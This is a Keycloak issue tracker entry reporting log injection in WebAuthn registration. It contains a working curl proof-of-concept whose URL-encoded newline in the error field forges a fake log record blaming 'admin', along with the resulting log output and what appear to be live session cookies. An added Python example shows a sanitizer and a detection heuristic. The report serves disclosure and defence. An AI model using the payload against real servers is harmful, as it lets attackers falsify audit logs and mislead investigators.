Red Hat build of Keycloak: RHBK-1034

[GHI#25078] Log Injection during WebAuthn authentication/registration




      Area

      authentication/webauthn

      Describe the bug

      Errors raised in the browser client during setup or authentication with "Security Key login" (WebAuthn) are written into the form, sent to Keycloak and written to the log without escaping. Arbitrary content can be sent in this request, which allows log injection.

      Version

      22.0.5

      Expected behavior

      Messages originating from user input are escaped to prevent (log) injection attacks.

      Actual behavior

      Request data is written to the log without escaping, which allows log injection.

      How to Reproduce?

      • Start a login with a user who is required to set up a second authentication factor
      • Configure "Security-Token"
      • Get the form URL (<FORM_URL>) from the page source
      • Run the following command in a terminal:

      ```shell
      curl '<FORM_URL>' \
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'Cookie: AUTH_SESSION_ID=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; AUTH_SESSION_ID_LEGACY=9249c14d-1baa-43ba-a110-bbcdff689e9e.19d58cc8a8cf-28439; KC_STATE_CHECKER=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.eyJta3kiOiJpbnZhbGlkQ29kZU1lc3NhZ2UiLCJtdHkiOiJFUlJPUiIsIm1wYXIiOltdLCJzdGF0Ijo0MDAsInN0MiI6ImY0NGE4NDU1LTU5MWYtNGNjYi1hZWZiLTIxYmQwMzE5OTRjYiJ9.AruNFsHMyHt1SF31TaRsN875qquIMSKhxp-dwfE4zts; KC_RESTART=eyJhbGciOiJIUzI1NiIsInR5cCIgOiAiSldUIiwia2lkIiA6ICI3NzQ1OTFkOC1hNGNlLTQ5MjUtODFlZS01NWQ5ZmM0YjhlZTgifQ.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.U2_FfhLkAzJILgHfVYVL1-4dE4B7oEULDtRTl5XpgBw; __snackbar=IjZmMjA3NGFiZTg4MDUxZGQi.3USigr8kqbvE758yaKF5QkElgCUgieTfik%2FewsWYuhw; __session=ImE4ZTFmZTRhMTUzZmNlZjIi.MsiBCXKE1XZZHwcBe2lbTQ2RwnoTNplIR5sByOMB97Q' \
      --data-raw 'clientDataJSON=&attestationObject=&publicKeyCredentialId=&authenticatorLabel=&transports=&error=invalid%5Fuser%5Fcredentials%2C%20credential%5Ftype%3Dwebauthn%2C%20auth%5Fmethod%3Dopenid%2Dconnect%2C%20web%5Fauthn%5Fregistration%5Ferror%5Fdetail%3D%27NotAllowedError%3A%20The%20operation%20either%20timed%20out%20or%20was%20not%20allowed%2E%20See%3A%20https%3A%2F%2Fwww%2Ew3%2Eorg%2FTR%2Fwebauthn%2D2%2F%23sctn%2Dprivacy%2Dconsiderations%2Dclient%2E%27%2C%20custom%5Frequired%5Faction%3Dwebauthn%2Dregister%2C%20response%5Ftype%3Dcode%2C%20web%5Fauthn%5Fregistration%5Ferror%3Dwebauthn%2Derror%2Dregister%2Dverification%2C%20redirect%5Furi%3Dhttp%3A%2F%2Flocalhost%3A8080%2Fauth%2Frealms%2Fc1%2Ds1%2Di1%2Faccount%2F%23%2F%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Da%27%0A2023%2D11%2D03%2009%3A32%3A33%2C614%20WARN%20%20%5Borg%2Ekeycloak%2Eevents%5D%20%28executor%2Dthread%2D14%29%20type%3DCUSTOM%5FREQUIRED%5FACTION%5FERROR%2C%20realmId%3Dinst%2D001%2D001%2D001%2C%20clientId%3Daccount%2Dconsole%2C%20userId%3Dd5410969%2D4a04%2D4f35%2D87d3%2D76b9343119b2%2C%20ipAddress%3D172%2E18%2E0%2E1%2C%20error%3Dthe%20admin%20did%20something%20very%20evil%21%21%21%2C%20remember%5Fme%3Dfalse%2C%20code%5Fid%3D9249c14d%2D1baa%2D43ba%2Da110%2Dbbcdff689e9e%2C%20response%5Fmode%3Dfragment%2C%20username%3Dadmin'
      ```

      The decoded `error` parameter contains the manipulated log entry (the `%0A` newline after `username=a'` starts a forged record):

      ```
      invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
      2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
      ```

      • After sending the request, the log contains the following entries:

      ```
      keycloak-base-keycloak-1 | 2023-11-03 10:14:01,861 WARN [org.keycloak.authentication.requiredactions.WebAuthnRegister] (executor-thread-52) WebAuthn API .create() response validation failure. invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
      keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin
      keycloak-base-keycloak-1 | 2023-11-03 10:14:01,870 WARN [org.keycloak.events] (executor-thread-52) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='invalid_user_credentials, credential_type=webauthn, auth_method=openid-connect, web_authn_registration_error_detail='NotAllowedError: The operation either timed out or was not allowed. See: https://www.w3.org/TR/webauthn-2/#sctn-privacy-considerations-client.', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a'
      keycloak-base-keycloak-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, realmId=inst-001-001-001, clientId=account-console, userId=d5410969-4a04-4f35-87d3-76b9343119b2, ipAddress=172.18.0.1, error=the admin did something very evil!!!, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=admin', custom_required_action=webauthn-register, response_type=code, web_authn_registration_error=webauthn-error-register-verification, redirect_uri=http://localhost:8080/auth/realms/c1-s1-i1/account/#/, remember_me=false, code_id=9249c14d-1baa-43ba-a110-bbcdff689e9e, response_mode=fragment, username=a
      ```

      This is only a PoC; more sophisticated log manipulation is certainly possible.
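      As an added example (not code from this report or from Keycloak), the Python below shows the unsafe interpolation pattern beside a hardened form that renders control characters visibly, and a defender-side heuristic that flags the out-of-order timestamps a pasted-in record leaves behind in the log excerpt above. The `error` value and the log lines are constructed, shortened copies of the ones in the report; all function names are hypothetical.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample: the start of the URL-encoded `error` value from the report's
# curl command (shortened); %0A is the newline that opens the forged record.
ERROR_PARAM = ("invalid%5Fuser%5Fcredentials%2C%20username%3Da%27%0A"
               "2023%2D11%2D03%2009%3A32%3A33%2C614%20WARN%20%20%5Borg%2Ekeycloak%2Eevents%5D"
               "%20%28executor%2Dthread%2D14%29%20error%3Dthe%20admin%20did%20something%20very%20evil%21")

CONTROL = re.compile(r"[\x00-\x1f\x7f]")

def log_unsafe(param: str) -> str:
    """Vulnerable pattern: the decoded request parameter is interpolated into the
    log message verbatim, so an embedded LF yields a second, attacker-chosen record."""
    return f"WARN [WebAuthnRegister] response validation failure. {unquote(param)}"

def sanitize_for_log(value: str) -> str:
    """Hardened form: control characters (CR, LF, ESC, ...) become visible escapes,
    so user input can never terminate or open a log record."""
    return CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)

def log_safe(param: str) -> str:
    return f"WARN [WebAuthnRegister] response validation failure. {sanitize_for_log(unquote(param))}"

# Constructed, shortened versions of the four log lines shown in the report.
SAMPLE_LOG = [
    "kc-1 | 2023-11-03 10:14:01,861 WARN [org.keycloak.authentication.requiredactions.WebAuthnRegister] (executor-thread-52) response validation failure. invalid_user_credentials, username=a'",
    "kc-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, error=the admin did something very evil!!!, username=admin",
    "kc-1 | 2023-11-03 10:14:01,870 WARN [org.keycloak.events] (executor-thread-52) type=CUSTOM_REQUIRED_ACTION_ERROR, error=invalid_user_credentials, username=a'",
    "kc-1 | 2023-11-03 09:32:33,614 WARN [org.keycloak.events] (executor-thread-14) type=CUSTOM_REQUIRED_ACTION_ERROR, error=the admin did something very evil!!!, username=admin'",
]

RECORD = re.compile(r"^(?:\S+ \| )?(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \w+ +\[")

def find_suspect_records(lines):
    """Detection heuristic: a logger appends records in time order, so a record whose
    timestamp is older than the newest one seen so far was most likely pasted in by
    unescaped input. Returns the 0-based indexes of such records."""
    suspects, newest = [], None
    for i, line in enumerate(lines):
        m = RECORD.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S,%f")
        if newest is not None and ts < newest:
            suspects.append(i)
        newest = ts if newest is None else max(newest, ts)
    return suspects
```

The timestamp heuristic is only a triage signal (clock skew or multi-node logs can also reorder records); the durable fix is the escaping done in `sanitize_for_log`, applied before any request-supplied string reaches the logger.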

      Anything else?

      This has been reported as a vulnerability, but was considered a security hardening issue.

      Assignee: Unassigned
      Reporter: Pavel Vlha (pvlha)